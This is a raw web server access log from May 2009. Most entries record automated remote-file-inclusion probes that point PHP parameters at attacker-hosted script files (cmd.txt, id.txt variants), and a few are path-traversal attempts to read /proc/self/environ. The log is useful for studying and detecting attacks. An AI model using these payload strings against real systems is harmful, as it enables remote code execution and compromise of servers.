208.116.34.106 - - [25/May/2009:23:37:32 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:33 -0500] "GET //config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:33 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:33 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:33 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:33 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:36 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:36 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:36 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:37 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:38 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:38 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:38 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:38 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:39 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:40 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:40 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.116.34.106 - - [25/May/2009:23:37:42 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
210.240.12.4 - - [25/May/2009:23:39:37 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
210.240.12.4 - - [25/May/2009:23:39:37 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.240.12.4 - - [25/May/2009:23:39:37 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
64.202.102.41 - - [25/May/2009:23:41:21 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
64.202.102.41 - - [25/May/2009:23:41:21 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
64.202.102.41 - - [25/May/2009:23:41:21 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
64.202.102.41 - - [25/May/2009:23:41:42 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
115.86.111.4 - - [25/May/2009:23:41:47 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
115.86.111.4 - - [25/May/2009:23:41:47 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
115.86.111.4 - - [25/May/2009:23:41:47 -0500] "GET /logs/access_log.1242000000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
115.86.111.4 - - [25/May/2009:23:41:57 -0500] "GET /logs/access_log.1239926400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
210.240.12.4 - - [25/May/2009:23:42:08 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
216.151.134.36 - - [25/May/2009:23:42:09 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.151.134.36 - - [25/May/2009:23:42:09 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.151.134.36 - - [25/May/2009:23:42:10 -0500] "GET /logs/access_log.1230422400//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.120.231.11 - - [25/May/2009:23:42:27 -0500] "GET //kunden/luechingermeyer/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.120.231.11 - - [25/May/2009:23:42:27 -0500] "GET /logs//kunden/luechingermeyer/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.120.231.11 - - [25/May/2009:23:42:27 -0500] "GET /logs/access_log.1241654400//kunden/luechingermeyer/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.55.106.168 - - [25/May/2009:23:42:49 -0500] "GET /logs/access_log.1173312000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.149.163.198 - - [25/May/2009:23:47:02 -0500] "GET //?path%5Bdocroot%5D=http://www.sbe.es/buggsbunny?? HTTP/1.1" 200 3245 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
62.149.163.198 - - [25/May/2009:23:47:03 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.61 (Macintosh; I; PPC)"
62.149.163.198 - - [25/May/2009:23:47:03 -0500] "GET //?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3245 "-""XXXXXX"
62.149.163.198 - - [25/May/2009:23:47:04 -0500] "GET //?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""XXXXXX"
62.149.163.198 - - [25/May/2009:23:47:10 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.sbe.es/buggsbunny?? HTTP/1.1" 200 190846 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
62.149.163.198 - - [25/May/2009:23:47:10 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.61 (Macintosh; I; PPC)"
62.149.163.198 - - [25/May/2009:23:47:12 -0500] "GET /logs//?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 190846 "-""XXXXXX"
62.149.163.198 - - [25/May/2009:23:47:14 -0500] "GET /logs//?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 190846 "-""XXXXXX"
65.55.106.114 - - [25/May/2009:23:47:47 -0500] "GET /logs/access_log.1121212800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.188.91.69 - - [25/May/2009:23:48:13 -0500] "GET /logs/access_log.1242432000//include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.188.91.69 - - [25/May/2009:23:48:13 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.188.91.69 - - [25/May/2009:23:48:13 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
124.0.54.98 - - [25/May/2009:23:51:01 -0500] "GET /logs/access_log.1240012800//ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon.no-ip.info/v8.id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
200.164.82.229 - - [25/May/2009:23:52:05 -0500] "GET /logs/access_log.1234051200ftp://solonmdr@ftp.xpg.com.br/cmd.txt? HTTP/1.1" 404 346 "-""Mozilla/3.0 (compatible; Indy Library)"
124.0.54.98 - - [25/May/2009:23:52:47 -0500] "GET /logs/access_log.1238976000//ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon.no-ip.info/v8.id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
65.55.106.241 - - [25/May/2009:23:58:17 -0500] "GET /logs/access_log.1127520000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.181.7.104 - - [25/May/2009:23:59:08 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
113.29.225.7 - - [26/May/2009:00:03:07 -0500] "GET /logs/access_log.1242432000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kirsch-immobilier.fr/photos_annonces/ventes/ukid2.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:00:03:07 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kirsch-immobilier.fr/photos_annonces/ventes/ukid2.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:00:03:07 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kirsch-immobilier.fr/photos_annonces/ventes/ukid2.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:00:03:33 -0500] "GET /logs/access_log.1241654400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kirsch-immobilier.fr/photos_annonces/ventes/ukid2.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
151.1.32.227 - - [26/May/2009:00:03:39 -0500] "GET /logs/phpyabs/moduli/libri/index.php?Azione=http://www.geocities.com/ichaon7_oi/cmd.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.813"
151.1.32.227 - - [26/May/2009:00:03:39 -0500] "GET /phpyabs/moduli/libri/index.php?Azione=http://www.geocities.com/ichaon7_oi/cmd.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.813"
124.0.54.98 - - [26/May/2009:00:04:19 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon@nsmsystem.no-ip.info/gid.txt%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
123.125.66.77 - - [26/May/2009:00:04:29 -0500] "GET /logs/access_log.1237334400 HTTP/1.1" 304 - "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.55.208.139 - - [26/May/2009:00:05:27 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [26/May/2009:00:05:30 -0500] "GET /logs/access_log.1236816000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
58.227.193.198 - - [26/May/2009:00:06:20 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:00:06:20 -0500] "GET /logs/access_log.1230422400//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:00:06:20 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:00:06:27 -0500] "GET /logs///index.php?_shop_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:00:06:27 -0500] "GET ///index.php?_shop_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:00:06:27 -0500] "GET /logs/access_log.1230681600///index.php?_shop_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:00:06:38 -0500] "GET /logs/access_log.1236470400///index.php?_shop_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.29.68.196 - - [26/May/2009:00:08:31 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.29.68.196 - - [26/May/2009:00:08:31 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.29.68.196 - - [26/May/2009:00:08:31 -0500] "GET /logs/access_log.1242086400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
72.29.68.196 - - [26/May/2009:00:08:59 -0500] "GET /logs/access_log.1242432000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:00:09:27 -0500] "GET /logs/access_log.1242432000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kirsch-immobilier.fr/photos_annonces/ventes/ukid2.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:00:09:27 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kirsch-immobilier.fr/photos_annonces/ventes/ukid2.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:00:09:27 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kirsch-immobilier.fr/photos_annonces/ventes/ukid2.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:00:11:31 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:00:11:31 -0500] "GET //?_zb_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:00:11:33 -0500] "GET /logs//?_zb_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 190846 "-""Mozilla/5.0"
65.55.106.230 - - [26/May/2009:00:24:18 -0500] "GET /logs/access_log.1158796800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [26/May/2009:00:30:03 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [26/May/2009:00:30:03 -0500] "GET /logs/access_log.1111536000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
208.116.34.106 - - [26/May/2009:00:34:53 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:00:34:53 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:00:34:53 -0500] "GET /logs/access_log.1242432000//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:00:36:42 -0500] "GET /logs/access_log.1240531200//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
62.140.23.192 - - [26/May/2009:00:36:47 -0500] "GET /show.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
62.140.23.192 - - [26/May/2009:00:36:47 -0500] "GET /logs/show.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
62.140.23.192 - - [26/May/2009:00:36:47 -0500] "GET /logs/access_log.1239494400/show.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.140.23.192 - - [26/May/2009:00:36:47 -0500] "GET /logs/access_log.1238112000/show.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.140.23.192 - - [26/May/2009:00:36:49 -0500] "GET /show.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
62.140.23.192 - - [26/May/2009:00:36:49 -0500] "GET /logs/show.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
62.140.23.192 - - [26/May/2009:00:36:49 -0500] "GET /logs/access_log.1239494400/show.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.140.23.192 - - [26/May/2009:00:36:49 -0500] "GET /logs/access_log.1238112000/show.php?path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:00:37:00 -0500] "GET /logs/access_log.1242086400//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:00:37:46 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:00:37:46 -0500] "GET /logs/access_log.1237507200//index.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:00:37:46 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:00:37:49 -0500] "GET /logs/access_log.1237507200//index.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:00:37:49 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:00:37:49 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
88.84.147.205 - - [26/May/2009:00:38:24 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.84.147.205 - - [26/May/2009:00:38:24 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.84.147.205 - - [26/May/2009:00:38:24 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
88.84.147.205 - - [26/May/2009:00:38:30 -0500] "GET /logs/access_log.1233792000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
193.239.248.148 - - [26/May/2009:00:39:57 -0500] "GET /logs//include/write.php?dir=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
193.239.248.148 - - [26/May/2009:00:39:57 -0500] "GET /logs//include/write.php?dir=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
193.239.248.148 - - [26/May/2009:00:39:57 -0500] "GET //include/write.php?dir=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
193.239.248.148 - - [26/May/2009:00:39:57 -0500] "GET //include/write.php?dir=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
115.86.111.4 - - [26/May/2009:00:40:49 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
115.86.111.4 - - [26/May/2009:00:40:49 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
115.86.111.4 - - [26/May/2009:00:40:49 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
115.86.111.4 - - [26/May/2009:00:40:49 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
218.246.20.221 - - [26/May/2009:00:41:56 -0500] "GET //config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.246.20.221 - - [26/May/2009:00:42:01 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.246.20.221 - - [26/May/2009:00:42:12 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
193.239.248.148 - - [26/May/2009:00:44:36 -0500] "GET /logs/errors.php?error=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
193.239.248.148 - - [26/May/2009:00:44:36 -0500] "GET /errors.php?error=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
193.239.248.148 - - [26/May/2009:00:44:58 -0500] "GET /logs/errors.php?error=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
193.239.248.148 - - [26/May/2009:00:44:59 -0500] "GET /errors.php?error=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
221.157.225.65 - - [26/May/2009:00:46:23 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
221.157.225.65 - - [26/May/2009:00:46:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
221.157.225.65 - - [26/May/2009:00:46:23 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
91.121.210.42 - - [26/May/2009:00:47:01 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [26/May/2009:00:47:01 -0500] "GET /logs/access_log.1241049600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [26/May/2009:00:47:01 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
221.157.225.65 - - [26/May/2009:00:47:30 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
221.157.225.65 - - [26/May/2009:00:47:30 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
221.157.225.65 - - [26/May/2009:00:47:37 -0500] "GET /logs/access_log.1236297600//s_loadenv.inc.php?DOCUMENT_ROOT=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
221.157.225.65 - - [26/May/2009:00:47:45 -0500] "GET /logs/access_log.1235692800//s_loadenv.inc.php?DOCUMENT_ROOT=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
